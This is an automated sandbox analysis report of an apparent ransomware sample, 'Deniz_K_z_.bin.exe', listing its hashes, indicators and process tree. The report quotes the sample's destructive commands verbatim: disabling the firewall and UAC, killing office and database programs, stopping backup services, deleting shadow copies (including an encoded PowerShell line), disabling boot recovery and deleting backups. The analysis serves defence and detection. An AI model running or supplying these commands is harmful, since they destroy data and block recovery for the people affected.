Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows10_x64 -
resource
win10 -
submitted
22/07/2020, 08:54
Static task
static1
Behavioral task
behavioral1
Sample
Deniz_K_z_.bin.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Deniz_K_z_.bin.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Deniz_K_z_.bin.exe
-
Size
3.4MB
-
MD5
fc78e6e58352151fb77a4b92f239d381
-
SHA1
4dda3af9601922394f0c16713180beb2ec88c050
-
SHA256
c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e
-
SHA512
4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489
Score
10/10
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Deniz_K_z_.bin.exe -
System policy modification 1 TTPs 17 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" Deniz_K_z_.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" Deniz_K_z_.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" Deniz_K_z_.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" Deniz_K_z_.bin.exe -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2996 vssadmin.exe 3768 vssadmin.exe 3092 vssadmin.exe -
Kills process with taskkill 14 IoCs
pid Process 868 taskkill.exe 3172 taskkill.exe 1644 taskkill.exe 3852 taskkill.exe 3728 taskkill.exe 3692 taskkill.exe 3852 taskkill.exe 1008 taskkill.exe 1760 taskkill.exe 2020 taskkill.exe 864 taskkill.exe 2992 taskkill.exe 2908 taskkill.exe 1004 taskkill.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious use of WriteProcessMemory 177 IoCs
description pid Process procid_target PID 976 wrote to memory of 3448 976 Deniz_K_z_.bin.exe 67 PID 976 wrote to memory of 3448 976 Deniz_K_z_.bin.exe 67 PID 976 wrote to memory of 3448 976 Deniz_K_z_.bin.exe 67 PID 976 wrote to memory of 3848 976 Deniz_K_z_.bin.exe 69 PID 976 wrote to memory of 3848 976 Deniz_K_z_.bin.exe 69 PID 976 wrote to memory of 3848 976 Deniz_K_z_.bin.exe 69 PID 976 wrote to memory of 3928 976 Deniz_K_z_.bin.exe 70 PID 976 wrote to memory of 3928 976 Deniz_K_z_.bin.exe 70 PID 976 wrote to memory of 3928 976 Deniz_K_z_.bin.exe 70 PID 976 wrote to memory of 3276 976 Deniz_K_z_.bin.exe 72 PID 976 wrote to memory of 3276 976 Deniz_K_z_.bin.exe 72 PID 976 wrote to memory of 3276 976 Deniz_K_z_.bin.exe 72 PID 976 wrote to memory of 3620 976 Deniz_K_z_.bin.exe 74 PID 976 wrote to memory of 3620 976 Deniz_K_z_.bin.exe 74 PID 976 wrote to memory of 3620 976 Deniz_K_z_.bin.exe 74 PID 976 wrote to memory of 3504 976 Deniz_K_z_.bin.exe 76 PID 976 wrote to memory of 3504 976 Deniz_K_z_.bin.exe 76 PID 976 wrote to memory of 3504 976 Deniz_K_z_.bin.exe 76 PID 976 wrote to memory of 2572 976 Deniz_K_z_.bin.exe 78 PID 976 wrote to memory of 2572 976 Deniz_K_z_.bin.exe 78 PID 976 wrote to memory of 2572 976 Deniz_K_z_.bin.exe 78 PID 3848 wrote to memory of 3092 3848 cmd.exe 81 PID 3848 wrote to memory of 3092 3848 cmd.exe 81 PID 3848 wrote to memory of 3092 3848 cmd.exe 81 PID 3448 wrote to memory of 2052 3448 cmd.exe 82 PID 3448 wrote to memory of 2052 3448 cmd.exe 82 PID 3448 wrote to memory of 2052 3448 cmd.exe 82 PID 3276 wrote to memory of 3692 3276 cmd.exe 83 PID 3276 wrote to memory of 3692 3276 cmd.exe 83 PID 3276 wrote to memory of 3692 3276 cmd.exe 83 PID 2572 wrote to memory of 2996 2572 cmd.exe 85 PID 2572 wrote to memory of 2996 2572 cmd.exe 85 PID 2572 wrote to memory of 2996 2572 cmd.exe 85 PID 3620 wrote to memory of 3796 3620 cmd.exe 86 PID 3620 wrote to memory of 3796 3620 cmd.exe 86 PID 3620 wrote to memory of 3796 3620 cmd.exe 86 PID 3928 wrote to memory of 3768 3928 cmd.exe 87 PID 3928 wrote to memory of 3768 3928 cmd.exe 87 PID 3928 wrote to memory of 3768 3928 cmd.exe 87 PID 3796 wrote to memory of 648 3796 net.exe 88 PID 3796 wrote to memory of 648 3796 net.exe 88 PID 3796 wrote to memory of 648 3796 net.exe 88 PID 3504 wrote to memory of 3512 3504 cmd.exe 89 PID 3504 wrote to memory of 3512 3504 cmd.exe 89 PID 3504 wrote to memory of 3512 3504 cmd.exe 89 PID 2572 wrote to memory of 512 2572 cmd.exe 90 PID 2572 wrote to memory of 512 2572 cmd.exe 90 PID 2572 wrote to memory of 512 2572 cmd.exe 90 PID 3620 wrote to memory of 3356 3620 cmd.exe 91 PID 3620 wrote to memory of 3356 3620 cmd.exe 91 PID 3620 wrote to memory of 3356 3620 cmd.exe 91 PID 3356 wrote to memory of 408 3356 net.exe 92 PID 3356 wrote to memory of 408 3356 net.exe 92 PID 3356 wrote to memory of 408 3356 net.exe 92 PID 3620 wrote to memory of 2908 3620 cmd.exe 93 PID 3620 wrote to memory of 2908 3620 cmd.exe 93 PID 3620 wrote to memory of 2908 3620 cmd.exe 93 PID 2908 wrote to memory of 1140 2908 net.exe 94 PID 2908 wrote to memory of 1140 2908 net.exe 94 PID 2908 wrote to memory of 1140 2908 net.exe 94 PID 3620 wrote to memory of 1644 3620 cmd.exe 96 PID 3620 wrote to memory of 1644 3620 cmd.exe 96 PID 3620 wrote to memory of 1644 3620 cmd.exe 96 PID 1644 wrote to memory of 3788 1644 net.exe 97 PID 1644 wrote to memory of 3788 1644 net.exe 97 PID 1644 wrote to memory of 3788 1644 net.exe 97 PID 3620 wrote to memory of 3848 3620 cmd.exe 99 PID 3620 wrote to memory of 3848 3620 cmd.exe 99 PID 3620 wrote to memory of 3848 3620 cmd.exe 99 PID 3848 wrote to memory of 2020 3848 net.exe 100 PID 3848 wrote to memory of 2020 3848 net.exe 100 PID 3848 wrote to memory of 2020 3848 net.exe 100 PID 3620 wrote to memory of 3784 3620 cmd.exe 102 PID 3620 wrote to memory of 3784 3620 cmd.exe 102 PID 3620 wrote to memory of 3784 3620 cmd.exe 102 PID 3784 wrote to memory of 1440 3784 net.exe 103 PID 3784 wrote to memory of 1440 3784 net.exe 103 PID 3784 wrote to memory of 1440 3784 net.exe 103 PID 3620 wrote to memory of 3292 3620 cmd.exe 105 PID 3620 wrote to memory of 3292 3620 cmd.exe 105 PID 3620 wrote to memory of 3292 3620 cmd.exe 105 PID 3292 wrote to memory of 408 3292 net.exe 106 PID 3292 wrote to memory of 408 3292 net.exe 106 PID 3292 wrote to memory of 408 3292 net.exe 106 PID 3620 wrote to memory of 2204 3620 cmd.exe 107 PID 3620 wrote to memory of 2204 3620 cmd.exe 107 PID 3620 wrote to memory of 2204 3620 cmd.exe 107 PID 2204 wrote to memory of 1132 2204 net.exe 108 PID 2204 wrote to memory of 1132 2204 net.exe 108 PID 2204 wrote to memory of 1132 2204 net.exe 108 PID 3620 wrote to memory of 3824 3620 cmd.exe 109 PID 3620 wrote to memory of 3824 3620 cmd.exe 109 PID 3620 wrote to memory of 3824 3620 cmd.exe 109 PID 3276 wrote to memory of 2020 3276 cmd.exe 110 PID 3276 wrote to memory of 2020 3276 cmd.exe 110 PID 3276 wrote to memory of 2020 3276 cmd.exe 110 PID 3824 wrote to memory of 564 3824 net.exe 111 PID 3824 wrote to memory of 564 3824 net.exe 111 PID 3824 wrote to memory of 564 3824 net.exe 111 PID 3276 wrote to memory of 2908 3276 cmd.exe 112 PID 3276 wrote to memory of 2908 3276 cmd.exe 112 PID 3276 wrote to memory of 2908 3276 cmd.exe 112 PID 3620 wrote to memory of 1744 3620 cmd.exe 113 PID 3620 wrote to memory of 1744 3620 cmd.exe 113 PID 3620 wrote to memory of 1744 3620 cmd.exe 113 PID 1744 wrote to memory of 3896 1744 net.exe 114 PID 1744 wrote to memory of 3896 1744 net.exe 114 PID 1744 wrote to memory of 3896 1744 net.exe 114 PID 3276 wrote to memory of 3852 3276 cmd.exe 115 PID 3276 wrote to memory of 3852 3276 cmd.exe 115 PID 3276 wrote to memory of 3852 3276 cmd.exe 115 PID 3620 wrote to memory of 1644 3620 cmd.exe 116 PID 3620 wrote to memory of 1644 3620 cmd.exe 116 PID 3620 wrote to memory of 1644 3620 cmd.exe 116 PID 1644 wrote to memory of 1168 1644 net.exe 117 PID 1644 wrote to memory of 1168 1644 net.exe 117 PID 1644 wrote to memory of 1168 1644 net.exe 117 PID 3276 wrote to memory of 864 3276 cmd.exe 118 PID 3276 wrote to memory of 864 3276 cmd.exe 118 PID 3276 wrote to memory of 864 3276 cmd.exe 118 PID 3620 wrote to memory of 2436 3620 cmd.exe 119 PID 3620 wrote to memory of 2436 3620 cmd.exe 119 PID 3620 wrote to memory of 2436 3620 cmd.exe 119 PID 2436 wrote to memory of 1844 2436 net.exe 120 PID 2436 wrote to memory of 1844 2436 net.exe 120 PID 2436 wrote to memory of 1844 2436 net.exe 120 PID 3620 wrote to memory of 648 3620 cmd.exe 121 PID 3620 wrote to memory of 648 3620 cmd.exe 121 PID 3620 wrote to memory of 648 3620 cmd.exe 121 PID 3276 wrote to memory of 1008 3276 cmd.exe 122 PID 3276 wrote to memory of 1008 3276 cmd.exe 122 PID 3276 wrote to memory of 1008 3276 cmd.exe 122 PID 648 wrote to memory of 2812 648 net.exe 123 PID 648 wrote to memory of 2812 648 net.exe 123 PID 648 wrote to memory of 2812 648 net.exe 123 PID 3620 wrote to memory of 2880 3620 cmd.exe 124 PID 3620 wrote to memory of 2880 3620 cmd.exe 124 PID 3620 wrote to memory of 2880 3620 cmd.exe 124 PID 2880 wrote to memory of 3864 2880 net.exe 125 PID 2880 wrote to memory of 3864 2880 net.exe 125 PID 2880 wrote to memory of 3864 2880 net.exe 125 PID 3620 wrote to memory of 1936 3620 cmd.exe 126 PID 3620 wrote to memory of 1936 3620 cmd.exe 126 PID 3620 wrote to memory of 1936 3620 cmd.exe 126 PID 3276 wrote to memory of 868 3276 cmd.exe 127 PID 3276 wrote to memory of 868 3276 cmd.exe 127 PID 3276 wrote to memory of 868 3276 cmd.exe 127 PID 1936 wrote to memory of 3192 1936 net.exe 128 PID 1936 wrote to memory of 3192 1936 net.exe 128 PID 1936 wrote to memory of 3192 1936 net.exe 128 PID 3620 wrote to memory of 1508 3620 cmd.exe 129 PID 3620 wrote to memory of 1508 3620 cmd.exe 129 PID 3620 wrote to memory of 1508 3620 cmd.exe 129 PID 3276 wrote to memory of 2992 3276 cmd.exe 130 PID 3276 wrote to memory of 2992 3276 cmd.exe 130 PID 3276 wrote to memory of 2992 3276 cmd.exe 130 PID 1508 wrote to memory of 3868 1508 net.exe 131 PID 1508 wrote to memory of 3868 1508 net.exe 131 PID 1508 wrote to memory of 3868 1508 net.exe 131 PID 3276 wrote to memory of 1004 3276 cmd.exe 132 PID 3276 wrote to memory of 1004 3276 cmd.exe 132 PID 3276 wrote to memory of 1004 3276 cmd.exe 132 PID 3276 wrote to memory of 3172 3276 cmd.exe 133 PID 3276 wrote to memory of 3172 3276 cmd.exe 133 PID 3276 wrote to memory of 3172 3276 cmd.exe 133 PID 3276 wrote to memory of 1760 3276 cmd.exe 134 PID 3276 wrote to memory of 1760 3276 cmd.exe 134 PID 3276 wrote to memory of 1760 3276 cmd.exe 134 PID 3276 wrote to memory of 3852 3276 cmd.exe 135 PID 3276 wrote to memory of 3852 3276 cmd.exe 135 PID 3276 wrote to memory of 3852 3276 cmd.exe 135 PID 3276 wrote to memory of 1644 3276 cmd.exe 136 PID 3276 wrote to memory of 1644 3276 cmd.exe 136 PID 3276 wrote to memory of 1644 3276 cmd.exe 136 PID 3276 wrote to memory of 3728 3276 cmd.exe 137 PID 3276 wrote to memory of 3728 3276 cmd.exe 137 PID 3276 wrote to memory of 3728 3276 cmd.exe 137 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\host Deniz_K_z_.bin.exe -
Disables Task Manager via registry modification
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
description pid Process Token: SeBackupPrivilege 3644 vssvc.exe Token: SeRestorePrivilege 3644 vssvc.exe Token: SeAuditPrivilege 3644 vssvc.exe Token: SeDebugPrivilege 3692 taskkill.exe Token: SeIncreaseQuotaPrivilege 512 WMIC.exe Token: SeSecurityPrivilege 512 WMIC.exe Token: SeTakeOwnershipPrivilege 512 WMIC.exe Token: SeLoadDriverPrivilege 512 WMIC.exe Token: SeSystemProfilePrivilege 512 WMIC.exe Token: SeSystemtimePrivilege 512 WMIC.exe Token: SeProfSingleProcessPrivilege 512 WMIC.exe Token: SeIncBasePriorityPrivilege 512 WMIC.exe Token: SeCreatePagefilePrivilege 512 WMIC.exe Token: SeBackupPrivilege 512 WMIC.exe Token: SeRestorePrivilege 512 WMIC.exe Token: SeShutdownPrivilege 512 WMIC.exe Token: SeDebugPrivilege 512 WMIC.exe Token: SeSystemEnvironmentPrivilege 512 WMIC.exe Token: SeRemoteShutdownPrivilege 512 WMIC.exe Token: SeUndockPrivilege 512 WMIC.exe Token: SeManageVolumePrivilege 512 WMIC.exe Token: 33 512 WMIC.exe Token: 34 512 WMIC.exe Token: 35 512 WMIC.exe Token: 36 512 WMIC.exe Token: SeIncreaseQuotaPrivilege 512 WMIC.exe Token: SeSecurityPrivilege 512 WMIC.exe Token: SeTakeOwnershipPrivilege 512 WMIC.exe Token: SeLoadDriverPrivilege 512 WMIC.exe Token: SeSystemProfilePrivilege 512 WMIC.exe Token: SeSystemtimePrivilege 512 WMIC.exe Token: SeProfSingleProcessPrivilege 512 WMIC.exe Token: SeIncBasePriorityPrivilege 512 WMIC.exe Token: SeCreatePagefilePrivilege 512 WMIC.exe Token: SeBackupPrivilege 512 WMIC.exe Token: SeRestorePrivilege 512 WMIC.exe Token: SeShutdownPrivilege 512 WMIC.exe Token: SeDebugPrivilege 512 WMIC.exe Token: SeSystemEnvironmentPrivilege 512 WMIC.exe Token: SeRemoteShutdownPrivilege 512 WMIC.exe Token: SeUndockPrivilege 512 WMIC.exe Token: SeManageVolumePrivilege 512 WMIC.exe Token: 33 512 WMIC.exe Token: 34 512 WMIC.exe Token: 35 512 WMIC.exe Token: 36 512 WMIC.exe Token: SeRestorePrivilege 656 WerFault.exe Token: SeBackupPrivilege 656 WerFault.exe Token: SeDebugPrivilege 656 WerFault.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 3852 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 1008 taskkill.exe Token: SeDebugPrivilege 868 taskkill.exe Token: SeDebugPrivilege 2992 taskkill.exe Token: SeDebugPrivilege 1004 taskkill.exe Token: SeDebugPrivilege 3172 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 3852 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 3728 taskkill.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 656 3512 WerFault.exe 89 -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe 656 WerFault.exe -
Modifies Windows Firewall 1 TTPs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"1⤵
- Checks whether UAC is enabled
- System policy modification
- Suspicious use of WriteProcessMemory
- Drops file in Drivers directory
PID:976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable2⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵PID:2052
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵PID:648
-
-
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵PID:408
-
-
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵PID:1140
-
-
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵PID:3788
-
-
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵PID:3848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵PID:2020
-
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵PID:3784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵PID:1440
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵PID:3292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵PID:408
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:2204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:1132
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵PID:3824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵PID:564
-
-
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵PID:1744
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵PID:3896
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵PID:1644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵PID:1168
-
-
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵PID:2436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵PID:1844
-
-
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵PID:648
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵PID:2812
-
-
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵PID:2880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵PID:3864
-
-
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵PID:1936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵PID:3192
-
-
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵PID:1508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵PID:3868
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵PID:3512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 7004⤵
- Suspicious use of AdjustPrivilegeToken
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:656
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2996
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:512
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3644